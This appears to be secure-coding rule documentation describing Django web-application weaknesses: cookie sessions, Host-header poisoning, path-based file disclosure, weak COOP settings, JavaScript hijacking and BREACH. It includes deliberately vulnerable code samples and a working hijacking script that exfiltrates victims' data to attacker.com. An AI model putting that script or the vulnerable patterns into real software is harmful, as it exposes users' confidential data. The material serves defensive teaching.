Storing session data in Cookies presents several problems:

1. Cookie-based sessions are not invalidated when a user logs out. If an attacker were to find, steal, or intercept a user's cookie they could impersonate the user even if that user had logged out.

2. Session cookies are signed to avoid tampering and guarantee the authenticity of the data, but it will not prevent replay attacks.

3. The session data will be stored using Django's tools for cryptographic signing and the SECRET_KEY setting. If the SECRET_KEY is leaked, an attacker cannot only falsify session data, but if application uses Pickle to serialize session data into cookies, an attacker will be able to craft malicious pickled data that will execute arbitrary code upon deserialization.

4. The session data is signed but not encrypted. This means that attackers will be able to read the session data but not modify it.

5. The cookie size and serialization process can pose a performace problem depending on site load.

The Django applications settings specifies "*" as an entry in the ALLOWED_HOSTS setting. This setting is used by django.http.HttpRequest.get_host() to validate the Host header. A value of "*" will allow any host in the Host header. An attacker may use this in cache poisoning attacks or for poisoning links in emails.

Example 1: An application offers a reset password feature where users can submit some kind of unique value to identify themselves (eg: email address) and then a password reset email will be sent with a link to a page to set up a new password. The link sent to the user can be constructed using the Host value to reference the site that serves the reset password feature in order to avoid hardcoded URLs. For example:

...
def reset_password(request):
  url = "http://%s/new_password/?token=%s" % (request.get_host(), generate_token())
  send_email(reset_link=url)
  redirect("home")
...

An attacker may try to reset a victim's password by submitting the victim's email and a fake Host header value pointing to a server he controls. The victim will receive an email with a link to the reset password system and if he decides to visit the link, she will be visiting the attacker-controlled site which will serve a fake form to collect the victim's credentials.

A file disclosure occurs when:
1. Data enters a program from an untrusted source.


2. The data is used to dynamically construct a path.

Example 1: The following code takes untrusted data and uses it to open a file that is returned to the user.

from django.http import FileResponse
...
def file_disclosure(request):
    path = request.GET['returnURL']
    return FileResponse(open(path, 'rb'))
...

If an attacker provided a URL with the request parameter matching a sensitive file location, they would be able to view that file. For example, "http://www.yourcorp.com/webApp/logic?returnURL=settings.py" would allow them to view the "settings.py" of the application.

It has become important to enforce the data privacy of a given web document due to the existance of side-channel exploits that result from vulnerabilities such as Spectre and Meltdown. The Cross-Origin Opener Policy (COOP) was created to help prevent sensitive information exposure due to side-channel attacks. Specifically, the COOP can enforce isolation of a document's browsing context group in regard to other external documents, such as popups.

Example 1: The following code shows an unsecure COOP setting of 'unsafe-none' in the Django framework. This might allow an external document to access the private data of a source document's browsing context group due to a side-channel attack.

SECURE_CROSS_ORIGIN_OPENER_POLICY = 'unsafe-none'

The Django application exposes the serve view of the static files application which is not designed to be deployed in a production environment. According to Django documentation:

"The static files tools are mostly designed to help with getting static files successfully deployed into production. This usually means a separate, dedicated static file server, which is a lot of overhead to mess with when developing locally. Thus, the staticfiles app ships with a quick and dirty helper view that you can use to serve files locally in development.

This view will only work if DEBUG is True.

That's because this view is grossly inefficient and probably insecure. This is only intended for local development, and should never be used in production."

An application may be vulnerable to JavaScript hijacking if it:
1) Uses JavaScript objects as a data transfer format
2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.

Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. The Same Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client's credentials, cull through it, and communicate it back to the attacker. JavaScript hijacking allows an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport mechanism, they are often vulnerable while traditional web applications are not.

The most popular format for communicating information in JavaScript is JavaScript Object Notation (JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is based on two types of data structures: arrays and objects. Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct that stands on its own as a valid JavaScript statement.

Example 1: The following example begins by showing a legitimate JSON interaction between the client and server components of a web application used to manage sales leads. It goes on to show how an attacker may mimic the client and gain access to the confidential data the server returns. Note that this example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when an object is created without the use of the new operator.

The client requests data from a server and evaluates the result as JSON with the following code:

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
    if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
    }
};
req.send(null);

When the code runs, it generates an HTTP request which appears as the following:

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant to this explanation.)
The server responds with an array in JSON format:

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
    "purchases":60000.00, "email":"brian@example.com" },
    {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
    "purchases":120000.00, "email":"katrina@example.com" },
    {"fname":"Jacob", "lname":"West", "phone":"6502135600",
    "purchases":45000.00, "email":"jacob@example.com" }]

In this case, the JSON contains confidential information associated with the current user (a list of sales leads). Other users cannot access this information without knowing the user's session identifier. (In most modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked into visiting a web page that contains the following malicious code, the victim's lead information will be sent to the attacker's web site.

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
    this.email setter = captureObject;
}

// Send the captured object back to the attacker's web site
function captureObject(x) {
    var objString = "";
    for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
    }
    objString += "email: " + x;
    var req = new XMLHttpRequest();
    req.open("GET", "http://attacker.com?obj=" +
            escape(objString),true);
    req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

The malicious code uses a script tag to include the JSON object in the current page. The web browser will send up the appropriate session cookie with the request. In other words, this request will be handled just as though it had originated from the legitimate application.

When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. Other attacks might override the default constructor for arrays instead. Applications that are built to be used in a mashup sometimes invoke a callback function at the end of each JavaScript message. The callback function is meant to be defined by another application in the mashup. A callback function makes a JavaScript hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site, the attacker may compensate by asking the user to log in and then displaying the legitimate login page for the application.

This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series of requests to the application by using JavaScript to dynamically generate script tags. This same technique is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one of the applications involved is malicious.

Example 2: The following code shows a sample Django view method that sends a JSON response containing sensitive data in the form of a JSON array.

from django.http.response import JsonResponse
...
def handle_upload(request):
    response = JsonResponse(sensitive_data, safe=False)  # Sensitive data is stored in a list
    return response

The Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) attack is a type of side-channel attack that allows attackers to steal sensitive information contained in HTTP responses transferred over an SSL/TLS-enabled channel. All existing SSL/TLS versions and ciphers are susceptible to this attack. If the following three conditions are met, an attacker may successfully conduct a BREACH attack against the application:

1. The application transmits a secret (for example, an anti-CSRF token) in the response.
2. The application reflects a user input in the same response containing a secret.
3. The web server is configured to use HTTP compression.

The size of a response compressed using gzip is determined by the amount of repetitions observed within its content. Thus when characters are repeated more often, the smaller the response size becomes. This allows an attacker to use the HTTP compression as an oracle which can indicate whether a guess supplied by an attacker to the application through the reflected parameter value is correct or not. If the guessed character matches the corresponding character in the secret, the size of the compressed response is smaller. The attacker may use this process to obtain the entire secret character-by-character through the analysis of the compression ratio for each request.

An attacker may use this technique to extract a secret from the HTTP responses even if the application is configured to serve content over a secure channel.

To evaluate whether the application is vulnerable to the BREACH attack, first review whether the application is configured to enable HTTP compression. If so, for each response containing a secret to be protected, evaluate whether a user input is included inside it.

This issue is reported because the Django application is configured to use CSRF tokens and GZip compression:

MIDDLEWARE_CLASSES = (
  ...
  'django.middleware.csrf.CsrfViewMiddleware',
  'django.middleware.gzip.GZipMiddleware',
  ...
)